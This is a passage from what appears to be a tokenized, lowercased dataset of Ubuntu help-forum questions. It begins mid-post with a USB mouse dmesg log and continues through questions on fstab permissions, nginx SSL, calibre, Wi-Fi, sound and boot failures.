travel mouse ] on f8:2f : a8 : f6:9e:68 [ 668.579114 ] hid-generic 0003:1d57:0016.0005 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 996.105735 ] hid-generic 0003:1d57:0016.0006 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 1830.199326 ] hid-generic 0003:1d57:0016.0007 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 2398.792426 ] usbcore : deregistering interface driver usbhid [ 2475.634229 ] hid-generic 0003:1d57:0016.0008 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 2475.634264 ] usbcore : registered new interface driver usbhid [ 2475.634266 ] usbhid : usb hid core driver [ 2525.971691 ] usbcore : deregistering interface driver usbhid [ 2543.889374 ] hid-generic 0003:1d57:0016.0009 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 2543.889421 ] usbcore : registered new interface driver usbhid [ 2543.889425 ] usbhid : usb hid core driver [ 3201.938897 ] hid-generic 0003:1d57:0016.000a : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4085.526877 ] hid-generic 0003:1d57:0016.000b : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4115.455972 ] hid-generic 0003:1d57:0016.000c : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4692.650960 ] hid-generic 0003:1d57:0016.000d : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4711.150861 ] hid-generic 0003:1d57:0016.000e : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4733.023785 ] usbcore : deregistering interface driver usbhid [ 4746.816347 ] hid-generic 0003:1d57:0016.000f : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4746.816399 ] usbcore : registered new interface driver usbhid [ 4746.816403 ] usbhid : usb hid core driver [ 4760.548654 ] usbcore : deregistering interface driver usbhid [ 4903.494084 ] hid-generic 0003:1d57:0016.0010 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 4903.494111 ] usbcore : registered new interface driver usbhid [ 4903.494114 ] usbhid : usb hid core driver [ 6965.109630 ] hid-generic 0003:1d57:0016.0011 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 7374.165148 ] hid-generic 0003:1d57:0016.0012 : input , hidraw1 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 from non working port ~ $ dmesg | grep -i usb [ 0.611014 ] acpi : bus type usb registered [ 0.611028 ] usbcore : registered new interface driver usbfs [ 0.611034 ] usbcore : registered new interface driver hub [ 0.611054 ] usbcore : registered new device driver usb [ 1.091888 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.092003 ] ehci-pci 0000:00:1a.0 : new usb bus registered , assigned bus number 1 [ 1.107412 ] ehci-pci 0000:00:1a.0 : usb 2.0 started , ehci 1.00 [ 1.107457 ] usb usb1 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.107459 ] usb usb1 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.107460 ] usb usb1 : product : ehci host controller [ 1.107462 ] usb usb1 : manufacturer : linux 3.13.0-24-generic ehci_hcd [ 1.107463 ] usb usb1 : serialnumber : 0000:00:1a.0 [ 1.107563 ] hub 1-0:1.0 : usb hub found [ 1.107769 ] ehci-pci 0000:00:1d.0 : new usb bus registered , assigned bus number 2 [ 1.123425 ] ehci-pci 0000:00:1d.0 : usb 2.0 started , ehci 1.00 [ 1.123463 ] usb usb2 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.123465 ] usb usb2 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.123467 ] usb usb2 : product : ehci host controller [ 1.123468 ] usb usb2 : manufacturer : linux 3.13.0-24-generic ehci_hcd [ 1.123470 ] usb usb2 : serialnumber : 0000:00:1d.0 [ 1.123559 ] hub 2-0:1.0 : usb hub found [ 1.123673 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.123685 ] uhci_hcd : usb universal host controller interface driver [ 1.123790 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 3 [ 1.123971 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0002 [ 1.123973 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.123975 ] usb usb3 : product : xhci host controller [ 1.123976 ] usb usb3 : manufacturer : linux 3.13.0-24-generic xhci_hcd [ 1.123978 ] usb usb3 : serialnumber : 0000:00:14.0 [ 1.124060 ] hub 3-0:1.0 : usb hub found [ 1.124352 ] xhci_hcd 0000:00:14.0 : new usb bus registered , assigned bus number 4 [ 1.124388 ] usb usb4 : new usb device found , idvendor=1d6b , idproduct=0003 [ 1.124390 ] usb usb4 : new usb device strings : mfr=3 , product=2 , serialnumber=1 [ 1.124391 ] usb usb4 : product : xhci host controller [ 1.124393 ] usb usb4 : manufacturer : linux 3.13.0-24-generic xhci_hcd [ 1.124394 ] usb usb4 : serialnumber : 0000:00:14.0 [ 1.124481 ] hub 4-0:1.0 : usb hub found [ 1.419706 ] usb 1-1 : new high-speed usb device number 2 using ehci-pci [ 1.552163 ] usb 1-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.552169 ] usb 1-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.552395 ] hub 1-1:1.0 : usb hub found [ 1.663933 ] usb 2-1 : new high-speed usb device number 2 using ehci-pci [ 1.796369 ] usb 2-1 : new usb device found , idvendor=8087 , idproduct=0024 [ 1.796375 ] usb 2-1 : new usb device strings : mfr=0 , product=0 , serialnumber=0 [ 1.796631 ] hub 2-1:1.0 : usb hub found [ 1.868353 ] usb 1-1.3 : new full-speed usb device number 3 using ehci-pci [ 1.961372 ] usb 1-1.3 : new usb device found , idvendor=147e , idproduct=1002 [ 1.961378 ] usb 1-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.961382 ] usb 1-1.3 : product : touchstrip fingerprint sensor [ 1.961385 ] usb 1-1.3 : manufacturer : upek [ 2.032285 ] usb 1-1.4 : new full-speed usb device number 4 using ehci-pci [ 2.126976 ] usb 1-1.4 : new usb device found , idvendor=105b , idproduct=e065 [ 2.126979 ] usb 1-1.4 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.126980 ] usb 1-1.4 : product : bcm43142a0 [ 2.126982 ] usb 1-1.4 : manufacturer : broadcom corp [ 2.126983 ] usb 1-1.4 : serialnumber : f82fa8f69e68 [ 2.196589 ] usb 1-1.5 : new high-speed usb device number 5 using ehci-pci [ 2.303677 ] usb 1-1.5 : new usb device found , idvendor=5986 , idproduct=0294 [ 2.303684 ] usb 1-1.5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 2.303701 ] usb 1-1.5 : product : integrated camera [ 2.303702 ] usb 1-1.5 : manufacturer : bison corp. [ 2.376573 ] usb 2-1.6 : new high-speed usb device number 3 using ehci-pci [ 2.471043 ] usb 2-1.6 : new usb device found , idvendor=058f , idproduct=6366 [ 2.471049 ] usb 2-1.6 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 2.471053 ] usb 2-1.6 : product : flash card reader/writer [ 2.471056 ] usb 2-1.6 : manufacturer : generic [ 2.471059 ] usb 2-1.6 : serialnumber : 058f63666435 [ 2.473996 ] usb-storage 2-1.6:1.0 : usb mass storage device detected [ 2.474063 ] scsi6 : usb-storage 2-1.6:1.0 [ 2.474113 ] usbcore : registered new interface driver usb-storage [ 15.350221 ] input : integrated camera as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.5/1-1.5:1.0/input/input11 [ 15.350398 ] usbcore : registered new interface driver uvcvideo [ 15.350403 ] usb video class driver ( 1.1.1 ) [ 15.424373 ] usbcore : registered new interface driver btusb [ 35.210577 ] input : dell bt travel mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4/1-1.4:1.0/bluetooth/hci0/hci0:11/input12 [ 67.208499 ] usb 3-3 : new full-speed usb device number 2 using xhci_hcd [ 72.231304 ] usb 3-3 : unable to read config index 0 descriptor/start : -110 [ 72.231310 ] usb 3-3 : ca n't read configurations , error -110 [ 72.343431 ] usb 3-3 : new full-speed usb device number 3 using xhci_hcd [ 77.225611 ] usb 3-3 : unable to read config index 0 descriptor/start : -71 [ 77.225616 ] usb 3-3 : ca n't read configurations , error -71 [ 81.419817 ] usb 1-1.2 : new full-speed usb device number 6 using ehci-pci [ 81.515238 ] usb 1-1.2 : new usb device found , idvendor=1d57 , idproduct=0016 [ 81.515246 ] usb 1-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 81.515251 ] usb 1-1.2 : product : hid wireless mouse [ 81.515254 ] usb 1-1.2 : manufacturer : hid wireless mouse [ 82.159290 ] input : hid wireless mouse hid wireless mouse as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/input/input13 [ 82.159659 ] hid-generic 0003:1d57:0016.0002 : input , hidraw0 : usb hid v1.10 mouse [ hid wireless mouse hid wireless mouse ] on usb-0000:00:1a.0-1.2/input0 [ 82.159855 ] usbcore : registered new interface driver usbhid [ 82.159860 ] usbhid : usb hid core driver [ 86.346971 ] usb 1-1.2 : usb disconnect , device number 6 full output . tweaked this further , problem solved mouse works on all the ports , and i think now someone can really help me . i went to usb setup in bios , it had 4 options , 1- auto smart , 2- smart , 3- enable , 4- disable . all point to the usb 3 os support , i tried all , mouse worked on all ports in disable mode . disable mode points the usb to 2.0. structure , mouse started working on the computer . can someone please try to help me . i think i need to tweak some file , maybe a config file in the hid . because now mouse is working but usb 3.0 is out .
464443	can i use git to backup all my server changes ?	i want to use git to monitor all the changes i make to my ubuntu server . if i rollback changes , can i run into trouble when i rollback changes ?
464445	auto mounting external hard disk using fstab gives all read write permission to it	this is the deal : i had been using my hard disk for quite a while and recently i used fstab to mount it automatically in /media/kevin/toshiba . now , whenever it is mounted , its permission becomes drwxrwxrwx . plugging-in the hard disk in another computer shows the default permission which is obviously not the above . how do i mount the h with the default permissions retained . edit 1 : this is my /etc/fstab entry : # < file system > < mount point > < type > < options > < dump > < pass > uuid=8c3669123668fe98 /media/kevin/kevin-toshiba ntfs defaults 0 0 i tried this too : # < file system > < mount point > < type > < options > < dump > < pass > uuid=8c3669123668fe98 /media/kevin/kevin-toshiba ntfs nls=iso8859-1 , permissions , users , auto 0 0
464446	why am i stuck on the rescue shell ?	i have an older desktop computer that i had n't used in a few years because i had n't had a land line . last night a booted it up and connected it to my land line and it worked great . before i went to bed , i set it up to upgrade from 8.4 ( told you i had n't used it in a while ) to 9.1 . i was going to just slowly upgrade it to the current level . in the morning it was frozen , so i shut it down . probably a mistake . when i tried to reboot it , it got as far as loading grub , then gave me the following message : starting up ... mount : mounting none on /dev failed : no such device udevd [ 866 ] : error getting socket : invalid argument error initializing netlink socket udevd [ 866 ] : error initializing netlink socket libudev : udev_monitor_new_from_netlink : error getting socket : invalid argument segmentation fault gave up waiting for root device . common problems : -boot args ( cat/proc/cmdline ) -check root delay ( did the system wait long enough ? ) -check root ( did the system wait for the right device ? ) -missing modules ( cat/proc/modules ; ls/dev ) alert ! /dev/disk/by-uuid-6ef025a9-5a72-475-9de3-312407265847 does not exsist dropping to a shell ! busybox u1.13.3 ( unbuntu1:1.12-1unbuntu11 ) built in shell ( ash ) enter 'help ' for a list of built in commands ( initcamfs ) _ and then i ca n't do anything , including enter help . this all seems bad . it 's been a while since i 've worked with linux , so i really do n't know what to do . is my hard drive toast ? can i at least save my files ? can i fix it ?
464450	why does my program crash if it does n't fit in the display ?	i used to make programs for my e-ink pocketbook using sdk from http : //pbsdk.vlasovsoft.net/ on 32bit ubuntu 12.04 , and it worked great . recently i went to 14.04 64bit . i use gcc with the -m32 option for compiling for emulator which what this question is about . i spent a whole day fighting with ld and getting the compiler to work . finally , my programs seemed to compile , but when i ran them they just crashed with segmentation fault ( core dumped ) . later i found out that program crashes on any screen drawing function . the emulator makes a window with dimensions of 600x800 and my laptop display uses 1366x768 . it was no problem on ubuntu 12.04 , but it seems to be an issue here . if i tell the emulator to rotate the the window 90 degrees , it does n't crash . i attached another display with dimensions of 1600x1200 , and it does n't crash . what should i do ? everything works good with xfce . if you comment fullupdate ( ) line it will not crash . # include `` inkview.h '' int main_handler ( int type , int par1 , int par2 ) { clearscreen ( ) ; //does n't draw to screen , only buffer fullupdate ( ) ; //draws to screen return 0 ; } int main ( int argc , char **argv ) { inkviewmain ( main_handler ) ; return 0 ; } outputs : gtk-message : failed to load module `` overlay-scrollbar '' glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . ** message : command 501 selected segmentation fault ( core dumped ) maybe it has to do something with overlay-scrollbar ?
464451	lost calls history in skype for lubuntu 14.04	i have installed this installation and i wonder why skype keeps showing that i have got some `` lost calls '' - the little number on top of the icon . even though i manually `` delete event '' by right clicking it still comes up next time i start skype , and in fact it 's not even a `` lost call '' - i did talk with the person . is there a `` problem '' ( =an error ! ) here or am i doing something wrong ?
464456	ssl on one domain and not the server ip or any virtual hosts ( nginx )	i have a ssl setup on my nginx server and the ssl works perfectly , only problem is it is working on all other virtual hosts and also the server ip which i do n't want it to . it should only work in the same server block as the domain where the ssl is activated . here is the server blocks : server { listen 80 ; root /var/www ; index index.html index.htm index.php ; server_name server.ip.here ; location / { try_files $ uri $ uri/ /index.html ; } location ~ \.php $ { try_files $ uri =404 ; fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; fastcgi_param script_filename $ document_root $ fastcgi_script_name ; include fastcgi_params ; } } server { listen 443 ; server_name server.ip.here ; ssl on ; ssl_certificate /etc/nginx/ssl/server.crt ; ssl_certificate_key /etc/nginx/ssl/server.key ; } server { listen 80 ; root /var/www/example.com ; index index.html index.htm index.php ; server_name example.com ; location / { try_files $ uri $ uri/ /index.html ; } } i want the ssl to work on the server ip and not the example.com virtual host . what 's the best way to do this ? thanks .
464457	ubuntu server ( tiny ) problem . ( 12.104 )	i am trying to set up a gaming server for ubuntu 12.04 . i want to try battlefield 1942 and minecraft . i was following this tutorial http : //youtu.be/rilo2r0wfli ? t=2m24s and get lost at what he does when he switches his windows . also . how do i get my server to access the outside world ? do i find/use/create a external ip ?
464459	updating calibre in 12.04 without losing the library	i have calibre 0.8.38 installed in my 12.04 . for some reason convert ebooks option is not working with all the jobs stuck at 1 % with status `` converting input to html '' ( it was working fine previously ) . i would like to update calibre to 0.9 or 1.0 versions in my 12.04 . is it possible to update these versions in my 12.04 ? i would like to have my existing library intact . also , is there a way to find out the reason for the erratic behaviour of `` convert books '' option of my existing calibre ?
464462	desktop will not load for specific user	i 'm fairly new to ubuntu . last time i played with it a bit was jaunty . now i have just built a 14.04 trusty file server and added the ubuntu desktop to make some management tasks easier . i was using the local desktop on the server successfully for several days . i tried using xwindows the other day with my account with varied success . now when i go back to the desktop on the server , it wo n't let me login . i can successfully login as another user and the desktop loads just fine . but when i try to login as my account , the login screen dissapears like its trying to load the desktop , and then it comes back to the login screen about 1-2 seconds later . i went into ctrl+alt+f1 and was able to login just fine . i ran : sudo stop lightdm sudo apt-get upgrade sudo start lightdm after reading another post on here , but no luck . any ideas ? are there user specific x windows files i can just go delete to perhaps put it back to how it was before ?
464463	setting system variables through terminal	i have added 2 fake users alice and bob to through terminal . how to export java home to that user 's .bash_profile . thanks much in advance ! ! !
464469	how to configure dynamic wep in command line	my isp force to use certificates through ieee 802.1x standard to log into their ( not ! -wireless ) network . there 's a client certificate myname.p12 and a server certificate hotzoneca.der . i must give my mac address too . there 's no networkmanager for the wired that i know , but i want to log in with my raspberry and i do n't know how to import the certificates the right way . edit : my isp do n't want to support linux , i should google `` xsupplicant '' and `` eap-tls '' and try to get it running . but i 'm not sure if the hint is useful .
464470	calibre - error converting with `` enable heuristic processing '' checked	i 'm facing a weird problem with calibre . if i convert a book and check the `` enable heuristic processing '' the conversion is just stuck at 1 % with status `` converting input to html '' . the conversion works when `` enable heuristic processing '' is not checked . the above problem is recent and was working fine previously . i updated my 0.8.36 to 1.36 version in my 12.04 . but the problem exists in the new version too . the conversion output is so weird if `` enable heuristic processing '' is unchecked . any help is greatly appreciated as i do a lot of converting with calibre .
464472	texmaker language babel	i installed texmaker on ubuntu 14.04 using the ubuntu software center . after entering command : \usepackage [ croatian ] { babel } i get following error : ! package babel error : unknown option `croatian ' . either you misspelled it i used texmaker on ubuntu 12.04 and this command worked fine . now characters like đ ca n't be spelled . is there a way to enable croatian language package ? thanks
464476	installing gtk+ > = 3.12 on ubuntu 14.04	i 'm just trying to install corebird . it has some dependencies and one of them is gtk+ > = 3.12 . i would say i have search a lot and finally frustrated from a lot of other dependencies . i 'm afraid if corebird worth it finally or not ! is there a straight-forward way to install gtk+ 3.12 on my ubuntu pc ? i mean step-by-step tutorial !
464477	android device manager for ubuntu	i have recently switched to ubuntu from windows and i was looking forward to get any android device managing app for ubuntu . i have an android tablet [ celkon ct2 ] which has preinstalled mobogenie i am looking foreward for any app equivalent to mobogenie of windows 7 in trusty tahr .
464478	how to mount powershot elph 300 hs on ubuntu 14.04 ?	i 'm null on cameras , and i 'm trying to mount my camera on ubuntu to see the photos . on lsusb : bus 003 device 011 : id 04a9:3229 canon , inc. powershot elph 300 hs / ixus 220 hs on dmesg : [ 27255.640204 ] usb 3-2 : new high-speed usb device number 10 using xhci_hcd [ 27255.658731 ] usb 3-2 : new usb device found , idvendor=04a9 , idproduct=3229 [ 27255.658737 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 27255.658740 ] usb 3-2 : product : canon digital camera [ 27255.658742 ] usb 3-2 : manufacturer : canon inc. [ 27255.658744 ] usb 3-2 : serialnumber : f4968a42347d4e75b2b44f8741730c04 [ 27255.777901 ] usb 3-2 : usb disconnect , device number 10 [ 27256.048432 ] usb 3-2 : new high-speed usb device number 11 using xhci_hcd [ 27256.067090 ] usb 3-2 : new usb device found , idvendor=04a9 , idproduct=3229 [ 27256.067100 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 27256.067107 ] usb 3-2 : product : canon digital camera [ 27256.067112 ] usb 3-2 : manufacturer : canon inc. [ 27256.067116 ] usb 3-2 : serialnumber : f4968a42347d4e75b2b44f8741730c04 nothing appear on nautilus , and no /dev/sdxx is created . my problem seems that there is no error and i was waiting to see a new device created , but it is not happening . how is the correct procedure to mount this camera ?
464481	how do i play local swf files in ubuntu 14.04	today i just upgrade my ubuntu 12.04 to 14.04 . the problem is that i can not play local swf files . even after installing flash player you can not play swf files . i can play online flash games in browser but not swf files when you have them downloaded in your computer any fix for this problem ? i tried gnash but that wo n't open swf in browser so the data that i have saved in cookies for that specific swf file wo n't restore . this problem is same for all browsers i have tried . ( chrome , chromium , firefox ) what i have tried is this command : sudo update-pepperflashplugin-nonfree -- install and this one : sudo apt-get install flashplugin-nonfree-extrasound just installed flash plugin for chrome still not fixed this is what i did : downloaded a tar file from adobe then these 3 commands : sudo mkdir /opt/google/chrome/plugins sudo cp libflashplayer.so /opt/google/chrome/plugins sudo cp âr usr/* /usr the internal flash player for chromium is activated : and also i tried gnash which did n't open my file . you can download the swf file from this site : http : //autoevony.jimdo.com/ there is a free version temporary solution for this problem is to upload your swf file to a website ( then you can view it from browser ) . i use bitbucket.org
464482	upgrade to 14.04 : sticky/unresponsive touchpad - requires more pressure ?	i recently upgraded my toshiba satellite c50d from 12.04 to 14.04 . everything works great except the touchpad . strangely , it is working , but it is noticeably unresponsive and feels `` sticky '' . with some experimentation i think it requires greater pressure before it responds . the thing is that if i boot back into 12.04 i do not have this problem , so it must be a software issue . i have checked : all parameters given by xinput are identical , except the device name has changed from `` ps/2 generic mouse '' to `` alps ps/2 device '' the settings in settings > mouse/touchpad are the same , except for the new two-finger scrolling things . does anyone have any idea as to how i can set up my touchpad to be the same as in 12.04 ?
464484	issue when runing apt-update with ubuntu 14.04 lts	i just installed fresh ubuntu 14.04 lts . when i run apt-get with root user , i get following error shown below . any idea how this can be fixed ? please advice . ********error*********** apt-get update get:1 http : //security.ubuntu.com trusty-security inrelease 100 % [ 1 inrelease gpgv 66.4 kb ] [ waiting for headers ] splitting up /var/lib/apt/lists/partial/security.ubuntu.com_ubunign ttp : //security.ubuntu.com trusty-security inreleasere failed e : gpg error : htp : //security.ubuntu.com trusty-security inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? )
464485	vlc is not working in trusty tahr	i 'm having some issues with the vlc player on ubuntu 14.04 . vlc is up to date but after the latest system update vlc is unable to play videos . it just plays the audio but not video . totem works fine for the same video file . any solutions ? thanks in advance .
464487	can see my hosted files after upgrading apache	i have lost web browser access to my local php files . fortunately phpmyadmin continues to work nicely . when i type my server ip in firefox i get : index of / [ ico ] name last modified size description apache/2.4.7 ( ubuntu ) server at localhost port 80 as if /var/www was empty , which is not the case . i guess that apache now has some other folder ( or none at all ) defined as root directory location , but i do not know how to fix it .
464493	gnome extensions not detecting gnome on system	after upgrade to ubuntu 14.04 , gnome does not detect gnome on my system and therefore i ca n't look at extensions installed . error : we can not detect a running copy of gnome on this system , so some parts of the interface may be disabled . see our troubleshooting entry for more information . it is n't mr browser blocking it , or the click to play feature . anyone have any ideas ?
464495	can not connect to my wifi after upgrade to kubuntu 14.04	happened after upgrade from 13.10 on asus netbook . wired connection works ok. network controller is qualcomm atheros ar8152 v2.0 wireless network adapter ( pci-express ) ( rev 01 )
464498	sound problem ubuntu 14.04	i 'm new ubuntu user i have install it few days ago i add my sound playing good but today i just realize that nothing is coming out of the speaker . i have tried all the settings sound settings nothing work out . please help ! the relevant details of my system : sudo apt-get install pulseaudiooutput : reading package lists ... done building dependency tree reading state information ... done pulseaudio is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 85 not upgraded . here is the info from alsa information script . and i did n't mute anything . lspci -nnk | grep -ia2 audio : 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 high definition audio controller [ 1002:437b ] ( rev 01 ) subsystem : toshiba america info systems device [ 1179 : ff10 ] 00:14.3 isa bridge [ 0601 ] : advanced micro devices , inc. [ amd/ati ] ixp sb4x0 pci-isa bridge [ 1002:4377 ] ( rev 80 ) alsamixer : can not open mixer : no such file or directory solution : i got my sound back and thanks to xubut-tur for your link i had to sudo alsa force-reload
464499	complex searches in kde 's baloo ?	i see baloo indexing my stuff . i wonder : how can i search in more complex ways ? ( maybe directly through sqlite or sth ? ) i wonder about , either sth `` user comfortable '' like advanced gmail search operators ( i imagine search requests like `` content : ( x y z ) file : ( .pdf ) -file : ( a . ) '' ) or at least sql ( or other more powerful ) interface .
464501	how can i enable macbook1,1 keyboard in 14.04 server ?	after a fresh installation of 14.04 i can not log in due to the keyboard not responding . the keyboard was fine during installation . edit : after this post i see , that its not a mac specific problem . i will remove this post if the answer to the linked question helps me .
464502	chromium does not run with sandbox on 14.04	i cant seem to get chromium which i download from https : //download-chromium.appspot.com/ here to work with the sandbox . it works fine with the -- disable-setuid-sandbox flag . i have chromium installed from the ubuntu software centre but i want the latest for testing websites . i have done this sudo mv chrome_sandbox chrome-sandbox sudo chown root chrome-sandbox sudo chmod 4755 chrome-sandbox ./chrome-wrapper but did n't work .
464506	how to compile clamav 0.98.3	i 've never compiled a program until now i 've only used windows xp as my unique os so i 've never needed to learn how to type these commands in the xubuntu 14.04 's terminal . i 've passed 3 days reading faqs about how to deal with this problem but i 've only been able to download clamav 0.98.3 from here http : //sourceforge.net/projects/clamav/files/clamav/0.98.3/ as well the clamav 's user know we ca n't only type $ sudo freshclam and automatically update our clamav 0.98.1 to 0.98.3 . please , explain me step by step how can i update my antivirus . thanks in advance .
464507	ubuntu 14.04 server - wifi wpa2 personal	i just installed ubuntu 14.04 server and can not get wifi configured correctly to work with wpa2 personal and could use some help . there was a simple wizard during install where i selected my ssid from a list and entered my passphrase and that worked great . now that the install is done i am having trouble configuring wifi . my access point is setup to wpa2 personal tkip or aes . any advice would be greatly appreciated . i have been messing around with wpa supplicant ant my /etc/network/interfaces file with no luck . thanks
464508	which manual installer settings do i have to chose ?	i have 2 physical hdds in my notebook . on the first , windows and a fresh ubuntu 14.04 installation should reside , while the second hdd should extend the home directory of a second user account ( which i will add after the installation ) by using lvm . optionally , the whole system should be encrypted , but in any case the home directories of both users . unfortunately i am not an expert - is it possible to achieve this with the standard ubuntu installer ? to further clarify : hdd1 : must contain the windows partitions and the ubuntu partitions . i guess for encryption i have to make a 100 mb partition for boot , a second partition for the actual system and the /home/user1 with the type . do i have to chose `` crypt '' here as the partition type ? at this point , do i have to make a first lvm partition on hdd1 to connect this later with the one on hdd2 ? hdd2 : contains only a lvm partition , which effectively should be mounted as /home/user2/documents
464514	install ubuntu and remove windows 8	i am sick of the new windows 8 . i just want to get rid of it completely and run ubuntu . i have a live cd . what do i need to do ?
464523	share data between windows 8 and ubuntu 14	i have tried searching for this but ca n't seem to find an answer . afetr a lot of work i have managed to dual boot windows 8.1 and ubuntu 14.04 on a 256 ssd . now i also have a 500gb hard drive that i was originally using in ubuntu . somewhere along the way i seen to have managed to format the disk or down something to it whereby is is not not readable in windows 8.1 and in ubuntu , under gparted it shows the following partition file system size used /dev/sda1 fat32 512mib 4.36mib /dev/sda2 ext2 244mib 52.28mib /dev/sda3 ! lvm pv 297.35gb - so my question is 1 ) how can i recover my data on this disk - use gpart ? 2 ) what can i do to have this disk readable in both windows 8.1 and ubuntu while preserving the data if possible . will a format as ntfs wipe the data
464525	ubuntu server installation problem	yesterday i started installing ubuntu server . it all worked very fine ( exept that i burned it to a dvd , and it did n't recognized that . i only have a cd drive. ) . so after the language settings , the installation stopped . i learned via google , that i need a ps/2 keyboard . so i connected my ps/2 keyboard . but the ps/2 keyboard do n't even worked in bios . i searched on google again , and i sucessfully resetted bios . the keyboard worked fine , but there was a `` graphic error '' by booting . i lokked into bios , and finally it worked . now it still hangs in installation . it is just the same as with usb keyboard . so i searched google again , and it seems like i 'm lonely with my problem . how can i solve this ?
464528	mouse works only in some applications	recently my mouse has been buggy ( actually one of the reasons i 'm switching from windows 8.1 ) ( i say mouse , but i mean mice , i 've tried several ) . it will work just fine , but when i try to click in the unity launcher to switch to a program such as terminal it wo n't work . if i then use alt+tab to switch to terminal i can not click in the still-exposed firefox to switch to that , and it will change the mouse cursor to show things in firefox as if i was still focused on the window ( show the hand when hovering over a link ) . but if i then try to type in firefox , thinking terminal is now just shown over all windows , it types in terminal . in windows 8.1 i had a similar problem , i would run a program , but would only be able to use my mouse in it to click and right-click and everything for about 20 seconds before it would stop responding . note : my mouse still moves around , i just ca n't click and sometimes it wo n't even register as hovering over something . i 'm currently on ubuntu 14.04 and the other os is windows 8.1 . any help is appreciated , ethan
464529	ubuntu frozen every time when memory usage over 80 %	ubuntu frozen every time when memory usage over 80 % , it seems that the system hangs due to a load of disk io - the screen is frozen and the only thing i can see is the indicator led of disk keeping light on . i 've already set swappiness to 1 , and this issue had bugged me since 12.10 is there any configuration i can do to fix the problem ? or i can only upgrade my ram size ? and in my experience windows only freezes when ram usage is over 95 % . if i set sudo swapoff -a the laggy issue is still there , maybe a little bit improved at least i can do some input , but the disk io is still abnormally frequent , the whole system is frozen from time to time .
464532	how to install rabbitvcs on ubuntu 14.04 ?	recently i installed ubuntu 14.04 , and i would like to install rabbitvcs on my system . does rabbitvcs work on the new ubuntu ? has someone already tried it out ?
464533	missing plug-in for tunesviewer	i installed tunesviewer from software center , and i am having this problem seeing tv show it says : missing plug-in i downloaded evasion for tunesviewer but can not install it when it says : you must install itunes for this program to work could this not work for tunesviewer , or should i find a hole other plug-in to make this work , can some one please help .
464534	ubuntu 14.04 lts randomly freezes ( graphics/unity only )	when i 'm just chilling on the desktop or doing whatever , ubuntu 14.04 lts will ( every 10-20 minutes or so ) just randomly freeze . the screen just stops , i ca n't see my mouse move , etc . however , i can alt+ctrl+f1 into a tty terminal ( though it 's not much use ) . however , i noticed that if i close my laptop 's lid , re-open it , then enter my password to unlock the lock screen , everything is fine . what is going on here ? how can i fix / stop / prevent this ? note : my laptop has an nvidia-optimus setup , but ubuntu 14.04 lts automatically recognized it and had the nvidia drivers applied .
